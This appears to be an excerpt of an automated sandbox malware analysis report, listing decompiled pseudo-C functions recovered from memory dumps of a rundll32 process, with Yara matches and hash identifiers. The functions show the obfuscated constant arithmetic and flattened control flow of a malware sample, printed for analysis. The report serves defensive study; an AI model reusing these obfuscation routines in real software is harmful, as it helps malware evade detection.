                                                                      • Instruction ID: e8d9411d7548e107a3edc76daa185944869da5a9bc4a1225097a1609e22d0293
                                                                      • Opcode Fuzzy Hash: b78e4ec7b0daa4de19488d10b39de6a407231f003e24876a1e2b7fd591ae7ca5
                                                                      • Instruction Fuzzy Hash: 442123B1D0121DEBDB08DFE5C84A8DEBBB1FB40300F108199E525A7250D7B95760DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a7f7724cf0b10ca78a4658c02a8dd5148ac5505d2730641fde13766f96e672f
                                                                      • Instruction ID: c3b13b202ae27bf9aff51685c78fed5288aab28b8a7e6c9e45a60d2912e0fb21
                                                                      • Opcode Fuzzy Hash: 4a7f7724cf0b10ca78a4658c02a8dd5148ac5505d2730641fde13766f96e672f
                                                                      • Instruction Fuzzy Hash: 61E11474A0030A9FDB12EFA9C88099EF7FAFF48704B1585A5E905A7621DB34ED41EF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 313ad05e5e01ffd17308f42d0f644463b69bf9ddbb935858998f0578b7221ae5
                                                                      • Instruction ID: 34cf851c62d9b84502eaa82827d149f8d86cd033138ef40f9c4ad6250dab79a3
                                                                      • Opcode Fuzzy Hash: 313ad05e5e01ffd17308f42d0f644463b69bf9ddbb935858998f0578b7221ae5
                                                                      • Instruction Fuzzy Hash: E4B18034B00354AFDB16DF68C995AAEB3F6EF49300F5544E6E404AB350CB39AE48EB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E01FFE612() {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				unsigned int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				char _v92;
                                                                      				signed int _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				signed int _t219;
                                                                      				short _t230;
                                                                      				short _t232;
                                                                      				void* _t237;
                                                                      				void* _t238;
                                                                      				void* _t258;
                                                                      				short* _t259;
                                                                      				void* _t260;
                                                                      				short* _t261;
                                                                      				short* _t262;
                                                                      				signed int _t263;
                                                                      				signed int _t264;
                                                                      				signed int _t265;
                                                                      				signed int _t266;
                                                                      				signed int _t267;
                                                                      				signed int _t268;
                                                                      				signed int _t269;
                                                                      				void* _t270;
                                                                      
                                                                      				_v96 = _v96 & 0x00000000;
                                                                      				_v108 = 0x4935a9;
                                                                      				_t238 = 0x2385cbc3;
                                                                      				_v104 = 0x1767a9;
                                                                      				_v100 = 0x71ae0c;
                                                                      				_v20 = 0x2668;
                                                                      				_t258 =  *0x2011088 + 0x38;
                                                                      				_v20 = _v20 | 0x7ba2ed9b;
                                                                      				_v20 = _v20 + 0xffff3c7d;
                                                                      				_v20 = _v20 + 0xffff231c;
                                                                      				_v20 = _v20 ^ 0x7ba17e9e;
                                                                      				_v56 = 0xe8af;
                                                                      				_v56 = _v56 + 0xfa0e;
                                                                      				_v56 = _v56 ^ 0x9e111eab;
                                                                      				_v56 = _v56 ^ 0x9e10e373;
                                                                      				_v24 = 0x871c;
                                                                      				_v24 = _v24 << 0xf;
                                                                      				_v24 = _v24 >> 4;
                                                                      				_v24 = _v24 + 0xffffba2c;
                                                                      				_v24 = _v24 ^ 0x0438e224;
                                                                      				_v60 = 0x90d6;
                                                                      				_v60 = _v60 | 0xb72a7a32;
                                                                      				_v60 = _v60 + 0xffff6a8c;
                                                                      				_v60 = _v60 ^ 0xb72a6d3a;
                                                                      				_v84 = 0xc38;
                                                                      				_v84 = _v84 | 0xf14ca8d2;
                                                                      				_v84 = _v84 ^ 0xf14c81a8;
                                                                      				_v80 = 0x2669;
                                                                      				_t263 = 0x64;
                                                                      				_v80 = _v80 / _t263;
                                                                      				_v80 = _v80 ^ 0x0000244e;
                                                                      				_v76 = 0xca1e;
                                                                      				_t264 = 0x22;
                                                                      				_v76 = _v76 / _t264;
                                                                      				_v76 = _v76 ^ 0x000038d6;
                                                                      				_v68 = 0x7bb5;
                                                                      				_v68 = _v68 | 0x2bfa8cc8;
                                                                      				_v68 = _v68 + 0xffff7471;
                                                                      				_v68 = _v68 ^ 0x2bfa6fbb;
                                                                      				_v32 = 0xfcd5;
                                                                      				_v32 = _v32 >> 0xf;
                                                                      				_v32 = _v32 ^ 0x2150d801;
                                                                      				_v32 = _v32 >> 0xa;
                                                                      				_v32 = _v32 ^ 0x000853df;
                                                                      				_v28 = 0xef37;
                                                                      				_v28 = _v28 ^ 0x5be54c03;
                                                                      				_v28 = _v28 | 0x52b36e66;
                                                                      				_v28 = _v28 + 0x9a0c;
                                                                      				_v28 = _v28 ^ 0x5bf8fb3a;
                                                                      				_v64 = 0xdcca;
                                                                      				_v64 = _v64 + 0xd7f5;
                                                                      				_v64 = _v64 >> 8;
                                                                      				_v64 = _v64 ^ 0x000070b2;
                                                                      				_v72 = 0xbeda;
                                                                      				_t265 = 0x5d;
                                                                      				_v72 = _v72 * 0x2c;
                                                                      				_v72 = _v72 ^ 0x0020a7ce;
                                                                      				_v8 = 0xad8b;
                                                                      				_v8 = _v8 ^ 0x0a8bb6d2;
                                                                      				_v8 = _v8 * 0x1a;
                                                                      				_v8 = _v8 << 0xc;
                                                                      				_v8 = _v8 ^ 0x0c70cf11;
                                                                      				_v16 = 0xcb7;
                                                                      				_v16 = _v16 / _t265;
                                                                      				_t266 = 0x25;
                                                                      				_v16 = _v16 / _t266;
                                                                      				_v16 = _v16 + 0xffff7a88;
                                                                      				_v16 = _v16 ^ 0xffff53c8;
                                                                      				_v52 = 0x513d;
                                                                      				_v52 = _v52 | 0x7fbc6d9f;
                                                                      				_v52 = _v52 ^ 0x7fbc6fd5;
                                                                      				_v12 = 0xd2d6;
                                                                      				_v12 = _v12 + 0xec15;
                                                                      				_v12 = _v12 | 0xf7fef9de;
                                                                      				_v12 = _v12 ^ 0xf7ffcc6d;
                                                                      				_v48 = 0x3b6f;
                                                                      				_v48 = _v48 + 0xffff5d9c;
                                                                      				_v48 = _v48 + 0xffff2e60;
                                                                      				_v48 = _v48 ^ 0xfffe9d66;
                                                                      				_v44 = 0xd292;
                                                                      				_v44 = _v44 + 0x28de;
                                                                      				_t219 = _v44;
                                                                      				_t267 = 0x15;
                                                                      				_t252 = _t219 % _t267;
                                                                      				_v44 = _t219 / _t267;
                                                                      				_t237 = 2;
                                                                      				_v44 = _v44 * 0x6d;
                                                                      				_v44 = _v44 ^ 0x000550f8;
                                                                      				_v40 = 0x4184;
                                                                      				_v40 = _v40 * 0x2c;
                                                                      				_v40 = _v40 + 0xa5cf;
                                                                      				_v40 = _v40 << 0xa;
                                                                      				_v40 = _v40 ^ 0x2fa1cfd8;
                                                                      				_v88 = 0x2b12;
                                                                      				_v88 = _v88 + 0xffff5308;
                                                                      				_v88 = _v88 ^ 0xffff15a9;
                                                                      				_v36 = 0x98e2;
                                                                      				_v36 = _v36 >> 2;
                                                                      				_v36 = _v36 + 0xffffa9a0;
                                                                      				_v36 = _v36 | 0xdd3f0fc1;
                                                                      				_v36 = _v36 ^ 0xffff9d62;
                                                                      				do {
                                                                      					while(_t238 != 0x135586c5) {
                                                                      						if(_t238 == 0x1d3b4bfc) {
                                                                      							_t268 = E01FFDF8A(_t238, _t252, __eflags, 0x10, 4);
                                                                      							E02009A27( &_v92, _t237, _v60, 1, _t258, _v84, _v80, _v76);
                                                                      							_t260 = _t258 + _t237;
                                                                      							_t252 = 1;
                                                                      							E02009A27( &_v92, 1, _v68, _t268, _t260, _v32, _v28, _v64);
                                                                      							_t270 = _t270 + 0x38;
                                                                      							_t261 = _t260 + _t268 * 2;
                                                                      							_t238 = 0x35eda080;
                                                                      							_t230 = 0x5c;
                                                                      							 *_t261 = _t230;
                                                                      							_t258 = _t261 + _t237;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t238 == 0x2385cbc3) {
                                                                      								_t232 = E01FFA156();
                                                                      								_v92 = _t232;
                                                                      								_t238 = 0x1d3b4bfc;
                                                                      								continue;
                                                                      							} else {
                                                                      								_t275 = _t238 - 0x35eda080;
                                                                      								if(_t238 == 0x35eda080) {
                                                                      									_t269 = E01FFDF8A(_t238, _t252, _t275, 0x10, 4);
                                                                      									_t252 = 1;
                                                                      									E02009A27( &_v92, 1, _v16, _t269, _t258, _v52, _v12, _v48);
                                                                      									_t270 = _t270 + 0x20;
                                                                      									_t262 = _t258 + _t269 * 2;
                                                                      									_t238 = 0x135586c5;
                                                                      									_t232 = 0x2e;
                                                                      									 *_t262 = _t232;
                                                                      									_t258 = _t262 + _t237;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					_t252 = 1;
                                                                      					E02009A27( &_v92, 1, _v44, 3, _t258, _v40, _v88, _v36);
                                                                      					_t259 = _t258 + 6;
                                                                      					_t270 = _t270 + 0x18;
                                                                      					_t238 = 0x18dc1a34;
                                                                      					 *_t259 = 0;
                                                                      					_t258 = _t259 + _t237;
                                                                      					__eflags = _t258;
                                                                      					L9:
                                                                      					__eflags = _t238 - 0x18dc1a34;
                                                                      				} while (__eflags != 0);
                                                                      				return _t232;
                                                                      			}


                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc2d789eabe48cdc59d171c9d20727d18d47b5be924bcbca87a47b244e86dfb7
                                                                      • Instruction ID: f6bd434f5c777389d5f28c709cc1c7e4b3743189eb17f216df19865100ad6e26
                                                                      • Opcode Fuzzy Hash: fc2d789eabe48cdc59d171c9d20727d18d47b5be924bcbca87a47b244e86dfb7
                                                                      • Instruction Fuzzy Hash: 7FB12272D01319EBEB28CFE5D8899DEBBB1FF44314F248159E101BA2A0D7B90A46CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
                                                                      • Instruction ID: 0dd1b5a6a7f7ffd2944eb3f3bdf97bfd0a1ccf7079c36a064748b420bab8be6f
                                                                      • Opcode Fuzzy Hash: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
                                                                      • Instruction Fuzzy Hash: AEB11372D11319EBDB28CFE5D88A5DEBBB1FF44314F248159E101BA2A0D7B80A56CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E0200CBE7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				short _v108;
                                                                      				char* _v112;
                                                                      				char* _v116;
                                                                      				signed int _v120;
                                                                      				char _v124;
                                                                      				char _v644;
                                                                      				char _v1164;
                                                                      				void* _t219;
                                                                      				signed int _t250;
                                                                      				signed int _t254;
                                                                      				signed int _t255;
                                                                      				signed int _t256;
                                                                      				signed int _t257;
                                                                      				signed int _t258;
                                                                      				signed int _t284;
                                                                      				void* _t286;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t286 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t219);
                                                                      				_v72 = 0xff63;
                                                                      				_t254 = 0x3f;
                                                                      				_v72 = _v72 / _t254;
                                                                      				_v72 = _v72 ^ 0x0000040c;
                                                                      				_v44 = 0x91a7;
                                                                      				_v44 = _v44 + 0x72f0;
                                                                      				_v44 = _v44 + 0xffff06b2;
                                                                      				_v44 = _v44 ^ 0x7ebd7edf;
                                                                      				_v44 = _v44 ^ 0x7ebd7382;
                                                                      				_v80 = 0x7372;
                                                                      				_v80 = _v80 + 0x2298;
                                                                      				_v80 = _v80 ^ 0x00009e0a;
                                                                      				_v32 = 0xf77b;
                                                                      				_v32 = _v32 + 0xffff7d6a;
                                                                      				_v32 = _v32 << 2;
                                                                      				_v32 = _v32 + 0x362;
                                                                      				_v32 = _v32 ^ 0x0001db13;
                                                                      				_v16 = 0x136c;
                                                                      				_v16 = _v16 + 0x48d8;
                                                                      				_v16 = _v16 ^ 0xac4e468e;
                                                                      				_v16 = _v16 >> 0xa;
                                                                      				_v16 = _v16 ^ 0x002b0548;
                                                                      				_v40 = 0x3373;
                                                                      				_v40 = _v40 + 0xffffe1ff;
                                                                      				_v40 = _v40 + 0xffff2492;
                                                                      				_v40 = _v40 >> 0xa;
                                                                      				_v40 = _v40 ^ 0x003fb2a7;
                                                                      				_v56 = 0x21f6;
                                                                      				_t255 = 0x1f;
                                                                      				_v56 = _v56 * 0x2b;
                                                                      				_v56 = _v56 / _t255;
                                                                      				_v56 = _v56 ^ 0x00002778;
                                                                      				_v68 = 0x53f7;
                                                                      				_v68 = _v68 ^ 0xc2013ade;
                                                                      				_v68 = _v68 ^ 0xc201165c;
                                                                      				_v88 = 0x904;
                                                                      				_v88 = _v88 + 0xffff70ae;
                                                                      				_v88 = _v88 ^ 0xffff0cbd;
                                                                      				_v12 = 0x6bbb;
                                                                      				_t256 = 0x5d;
                                                                      				_t284 = 0x1e;
                                                                      				_v12 = _v12 * 0x56;
                                                                      				_v12 = _v12 + 0x87c0;
                                                                      				_v12 = _v12 + 0xffff5e93;
                                                                      				_v12 = _v12 ^ 0x002412a1;
                                                                      				_v8 = 0x6b19;
                                                                      				_v8 = _v8 / _t256;
                                                                      				_v8 = _v8 >> 1;
                                                                      				_v8 = _v8 / _t284;
                                                                      				_v8 = _v8 ^ 0x00002578;
                                                                      				_v24 = 0x1b3a;
                                                                      				_v24 = _v24 + 0x4480;
                                                                      				_v24 = _v24 + 0xffff3a7d;
                                                                      				_v24 = _v24 + 0xffff7f01;
                                                                      				_v24 = _v24 ^ 0xffff7fa1;
                                                                      				_v28 = 0x593f;
                                                                      				_v28 = _v28 >> 7;
                                                                      				_v28 = _v28 ^ 0x30479afe;
                                                                      				_v28 = _v28 | 0x2165af19;
                                                                      				_v28 = _v28 ^ 0x3167a871;
                                                                      				_v76 = 0x861a;
                                                                      				_v76 = _v76 >> 0x10;
                                                                      				_v76 = _v76 ^ 0x00001e41;
                                                                      				_v20 = 0xbc3c;
                                                                      				_v20 = _v20 + 0xffff2788;
                                                                      				_v20 = _v20 >> 6;
                                                                      				_v20 = _v20 + 0xffff65b3;
                                                                      				_v20 = _v20 ^ 0x03ff130c;
                                                                      				_v92 = 0x12c7;
                                                                      				_v92 = _v92 + 0xffff7146;
                                                                      				_v92 = _v92 ^ 0xffff9baa;
                                                                      				_v36 = 0xedf2;
                                                                      				_v36 = _v36 << 3;
                                                                      				_t257 = 0xc;
                                                                      				_v36 = _v36 * 0xa;
                                                                      				_v36 = _v36 ^ 0x56c2f471;
                                                                      				_v36 = _v36 ^ 0x5688d77c;
                                                                      				_v64 = 0x6a0;
                                                                      				_v64 = _v64 * 0x5b;
                                                                      				_v64 = _v64 ^ 0x0002624d;
                                                                      				_v84 = 0xe931;
                                                                      				_v84 = _v84 * 0x43;
                                                                      				_v84 = _v84 ^ 0x003d25b3;
                                                                      				_v60 = 0xc012;
                                                                      				_t258 = 0x27;
                                                                      				_v60 = _v60 / _t257;
                                                                      				_v60 = _v60 ^ 0x00000568;
                                                                      				_v48 = 0xfc11;
                                                                      				_v48 = _v48 | 0xf924173d;
                                                                      				_v48 = _v48 / _t258;
                                                                      				_v48 = _v48 ^ 0x06636dad;
                                                                      				_v52 = 0xa67a;
                                                                      				_v52 = _v52 ^ 0x536712b1;
                                                                      				_v52 = _v52 << 2;
                                                                      				_v52 = _v52 ^ 0x4d9efdac;
                                                                      				E01FF5755(_v32,  &_v124, _v16, _v40, _t284);
                                                                      				E01FF5755(_v56,  &_v644, _v68, _v88, 0x208);
                                                                      				E01FF5755(_v12,  &_v1164, _v8, _v24, 0x208);
                                                                      				E020003F1(_v28, _v76, _t286,  &_v644, _v20, _v92);
                                                                      				E020003F1(_v36, _v64, _a12,  &_v1164, _v84, _v60);
                                                                      				_v120 = _v72;
                                                                      				_v116 =  &_v644;
                                                                      				_v112 =  &_v1164;
                                                                      				_v108 = _v80 | _v44;
                                                                      				_t250 = E01FFE554(_v48,  &_v124, _v52);
                                                                      				asm("sbb eax, eax");
                                                                      				return  ~_t250 + 1;
                                                                      			}

                                                                      0x0200ccd3
                                                                      0x0200ccd6
                                                                      0x0200ccdd
                                                                      0x0200cce4
                                                                      0x0200cceb
                                                                      0x0200ccf2
                                                                      0x0200ccf9
                                                                      0x0200cd00
                                                                      0x0200cd07
                                                                      0x0200cd12
                                                                      0x0200cd15
                                                                      0x0200cd16
                                                                      0x0200cd19
                                                                      0x0200cd20
                                                                      0x0200cd27
                                                                      0x0200cd2e
                                                                      0x0200cd3c
                                                                      0x0200cd3f
                                                                      0x0200cd47
                                                                      0x0200cd4a
                                                                      0x0200cd51
                                                                      0x0200cd58
                                                                      0x0200cd5f
                                                                      0x0200cd66
                                                                      0x0200cd6d
                                                                      0x0200cd76
                                                                      0x0200cd7d
                                                                      0x0200cd81
                                                                      0x0200cd88
                                                                      0x0200cd8f
                                                                      0x0200cd96
                                                                      0x0200cd9d
                                                                      0x0200cda1
                                                                      0x0200cda8
                                                                      0x0200cdaf
                                                                      0x0200cdb6
                                                                      0x0200cdba
                                                                      0x0200cdc1
                                                                      0x0200cdc8
                                                                      0x0200cdcf
                                                                      0x0200cdd6
                                                                      0x0200cddd
                                                                      0x0200cde4
                                                                      0x0200cdee
                                                                      0x0200cdf1
                                                                      0x0200cdf4
                                                                      0x0200cdfb
                                                                      0x0200ce02
                                                                      0x0200ce0d
                                                                      0x0200ce10
                                                                      0x0200ce17
                                                                      0x0200ce22
                                                                      0x0200ce25
                                                                      0x0200ce2c
                                                                      0x0200ce38
                                                                      0x0200ce39
                                                                      0x0200ce3e
                                                                      0x0200ce45
                                                                      0x0200ce4c
                                                                      0x0200ce59
                                                                      0x0200ce5f
                                                                      0x0200ce66
                                                                      0x0200ce6d
                                                                      0x0200ce74
                                                                      0x0200ce78
                                                                      0x0200ce88
                                                                      0x0200cea2
                                                                      0x0200ceb7
                                                                      0x0200ced0
                                                                      0x0200ceee
                                                                      0x0200cef9
                                                                      0x0200cf02
                                                                      0x0200cf0b
                                                                      0x0200cf1a
                                                                      0x0200cf1e
                                                                      0x0200cf28
                                                                      0x0200cf30

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E02002FA1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				char _v56;
                                                                      				intOrPtr _v60;
                                                                      				void* _v64;
                                                                      				char _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				char _v152;
                                                                      				void* _t110;
                                                                      				void* _t117;
                                                                      				intOrPtr _t123;
                                                                      				intOrPtr _t125;
                                                                      				intOrPtr _t127;
                                                                      				intOrPtr _t129;
                                                                      				intOrPtr _t131;
                                                                      				intOrPtr _t160;
                                                                      				void* _t161;
                                                                      				void* _t163;
                                                                      				void* _t164;
                                                                      
                                                                      				_t164 = __eflags;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t110);
                                                                      				_v88 = 0x5fdafb;
                                                                      				_t150 =  &_v152;
                                                                      				_v84 = 0x272783;
                                                                      				_t160 = 0;
                                                                      				_v80 = 0xd89dc;
                                                                      				_v76 = 0;
                                                                      				_v48 = 0x58f7;
                                                                      				_v48 = _v48 + 0xcffd;
                                                                      				_v48 = _v48 ^ 0x00015f94;
                                                                      				_v12 = 0xd46e;
                                                                      				_v12 = _v12 | 0xfa6bedce;
                                                                      				_v12 = _v12 >> 4;
                                                                      				_v12 = _v12 ^ 0x0fa6c3f2;
                                                                      				_v16 = 0x3620;
                                                                      				_v16 = _v16 | 0xaf83d9cf;
                                                                      				_v16 = _v16 ^ 0x6ff25359;
                                                                      				_v16 = _v16 >> 3;
                                                                      				_v16 = _v16 ^ 0x180e6d86;
                                                                      				_v44 = 0x33ae;
                                                                      				_v44 = _v44 + 0xffff05b5;
                                                                      				_v44 = _v44 ^ 0xffff5bf3;
                                                                      				_v24 = 0x830a;
                                                                      				_v24 = _v24 | 0xa02b6576;
                                                                      				_v24 = _v24 + 0xffff5bd8;
                                                                      				_v24 = _v24 ^ 0xa02b6dd8;
                                                                      				_v28 = 0xcb19;
                                                                      				_v28 = _v28 << 7;
                                                                      				_v28 = _v28 << 1;
                                                                      				_v28 = _v28 ^ 0x00cb50e4;
                                                                      				_v36 = 0x6363;
                                                                      				_v36 = _v36 | 0xa74857af;
                                                                      				_v36 = _v36 ^ 0x416ac2c3;
                                                                      				_v36 = _v36 ^ 0xe622f2da;
                                                                      				_v32 = 0xc5a6;
                                                                      				_v32 = _v32 ^ 0x561a69db;
                                                                      				_v32 = _v32 << 7;
                                                                      				_v32 = _v32 ^ 0x0d563ace;
                                                                      				_v40 = 0x6155;
                                                                      				_v40 = _v40 >> 0xb;
                                                                      				_v40 = _v40 * 0x3b;
                                                                      				_v40 = _v40 ^ 0x00001994;
                                                                      				_v20 = 0xb711;
                                                                      				_v20 = _v20 >> 7;
                                                                      				_v20 = _v20 * 0x78;
                                                                      				_v20 = _v20 >> 0xe;
                                                                      				_v20 = _v20 ^ 0x00000d9d;
                                                                      				E01FFFEE3(_a4,  &_v152, _v48, _v12, _v16, _v44);
                                                                      				_t117 = E01FFF914(_v24, _v28, _t164, _v36,  &_v72, _v32, _t150);
                                                                      				_t163 = _t161 + 0x2c;
                                                                      				while(_t117 != 0) {
                                                                      					__eflags = E01FFBE74(_v40,  &_v64, _v20,  &_v72);
                                                                      					if(__eflags != 0) {
                                                                      						_t123 = _v60 - 1;
                                                                      						__eflags = _t123;
                                                                      						if(_t123 == 0) {
                                                                      							E02003F4F(_v64,  &_v56);
                                                                      						} else {
                                                                      							_t125 = _t123 - 1;
                                                                      							__eflags = _t125;
                                                                      							if(_t125 == 0) {
                                                                      								E01FF240F(_v64,  &_v56);
                                                                      							} else {
                                                                      								_t127 = _t125 - 1;
                                                                      								__eflags = _t127;
                                                                      								if(_t127 == 0) {
                                                                      									E0200D70B(_v64,  &_v56);
                                                                      								} else {
                                                                      									_t129 = _t127 - 1;
                                                                      									__eflags = _t129;
                                                                      									if(_t129 == 0) {
                                                                      										E01FFADAF(_v64,  &_v56);
                                                                      									} else {
                                                                      										_t131 = _t129 - 6;
                                                                      										__eflags = _t131;
                                                                      										if(_t131 == 0) {
                                                                      											E0200BBF1(_v64,  &_v56);
                                                                      										} else {
                                                                      											__eflags = _t131 == 1;
                                                                      											if(_t131 == 1) {
                                                                      												E02006BE4(_v64,  &_v56);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t160 = _t160 + 1;
                                                                      						__eflags = _t160;
                                                                      					}
                                                                      					_t117 = E01FFF914(_v24, _v28, __eflags, _v36,  &_v72, _v32,  &_v152);
                                                                      					_t163 = _t163 + 0x10;
                                                                      				}
                                                                      				return _t160;
                                                                      			}
                                                                      0x02003132
                                                                      0x02003135
                                                                      0x0200314d
                                                                      0x02003137
                                                                      0x02003137
                                                                      0x02003138
                                                                      0x02003140
                                                                      0x02003140
                                                                      0x02003138
                                                                      0x02003135
                                                                      0x02003130
                                                                      0x0200312d
                                                                      0x0200312a
                                                                      0x02003186
                                                                      0x02003186
                                                                      0x02003186
                                                                      0x0200319e
                                                                      0x020031a3
                                                                      0x020031a3
                                                                      0x020031b4

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
                                                                      • Instruction ID: b8cdbc0c3a6d51ab4d858ecf84520102bdfe34f71d26559464b990975b993f10
                                                                      • Opcode Fuzzy Hash: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
                                                                      • Instruction Fuzzy Hash: 0251F371C0431EABEF09DFA4D9858EEBBB6FF48304F208158D511B62A4DBB55A05CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7070687d6ceda5e5642993e06f2153beae939ad7cb8a2d3d8133440fa5b476b5
                                                                      • Instruction ID: 2c536a0daeb778243eac57dfe0014ed73accfa0e1f2af864d89c58e20918a044
                                                                      • Opcode Fuzzy Hash: 7070687d6ceda5e5642993e06f2153beae939ad7cb8a2d3d8133440fa5b476b5
